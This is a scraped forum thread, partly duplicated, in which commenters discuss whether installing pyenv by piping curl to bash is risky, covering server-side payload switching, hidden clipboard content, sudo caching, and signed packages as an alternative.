Is this much worse than downloading some installer and running it? Those can be just as compromised. So can packages in package managers for that matter.
Piping straight to bash can be especially bad if you've cached sudo credentials for the current session - some of these scripts call sudo "inside".
Otoh - the connection is signed (it's https)-unfortunately it's often quite easy to compromise a web site. Obviously, listing gpg signatures on the same page doesn't add much unless it's possible to verify the gpg key some other way.
Ed: another problem is that you really should check exactly what's in you clipboard before pasting to a terminal.
> Is this much worse than downloading some installer and running it?
Yes.
You should inspect what you download.
Also, you should probably use the Python interpreters provided by your Linux distro, that stay in directories you usually can't write to and come in signed packages. On a Mac, the next best thing would be MacPorts.
I think it'll compile various Pythons on your machine under your user. I'd prefer to install (learned this today) with Homebrew multiple versions (not sure how possible it is) as `brew install python@3.6 python@3.7 python@3.9` (because Big Sur has 3.8 built-in).
In reality, I'm a more traditional Unix person and prefer MacPorts, where you can do `sudo port install python36 python37 python39` in a very BSD way of doing things.
Homebrew has broken my computer one time too many.
The script is served over https, so it's not going to be tanpwred with (unless you have a malicious cert, but at that point you can't trust anyone), and curl | bash isn't any worse than downloading a script and just running it, or running a precompiled binary you don't trust.
pyenv could get taken over and you won't know. It's also possible to detect when someone is piping to bash (on the server) and serve a different payload [0]. You're better off piping curl to a file, reviewing the file and then running it manually.
It's also possible for you to copy things you can't see from web pages. So the command(s) you end up with may not be what you thought. So there's a trust issue with the site you get instructions from ass well.
bananabiscuit|4 years ago
e12e|4 years ago
You can't know that curl and your browser get the same data - but you can for example split it up:
Ed: or just "save as" like with an installer.Piping straight to bash can be especially bad if you've cached sudo credentials for the current session - some of these scripts call sudo "inside".
Otoh - the connection is signed (it's https)-unfortunately it's often quite easy to compromise a web site. Obviously, listing gpg signatures on the same page doesn't add much unless it's possible to verify the gpg key some other way.
Ed: another problem is that you really should check exactly what's in you clipboard before pasting to a terminal.
rbanffy|4 years ago
Yes.
You should inspect what you download.
Also, you should probably use the Python interpreters provided by your Linux distro, that stay in directories you usually can't write to and come in signed packages. On a Mac, the next best thing would be MacPorts.
kim0|4 years ago
nxpnsv|4 years ago
rbanffy|4 years ago
In reality, I'm a more traditional Unix person and prefer MacPorts, where you can do `sudo port install python36 python37 python39` in a very BSD way of doing things.
Homebrew has broken my computer one time too many.
maccard|4 years ago
The script is served over https, so it's not going to be tanpwred with (unless you have a malicious cert, but at that point you can't trust anyone), and curl | bash isn't any worse than downloading a script and just running it, or running a precompiled binary you don't trust.
doix|4 years ago
[0]: https://www.idontplaydarts.com/2016/04/detecting-curl-pipe-b...
jayknight|4 years ago
See http://thejh.net/misc/website-terminal-copy-paste
Cthulhu_|4 years ago
They should offer a download with signature validation instead. Signed by Apple, Microsoft, etc if possible.
ktm8|4 years ago
lvncelot|4 years ago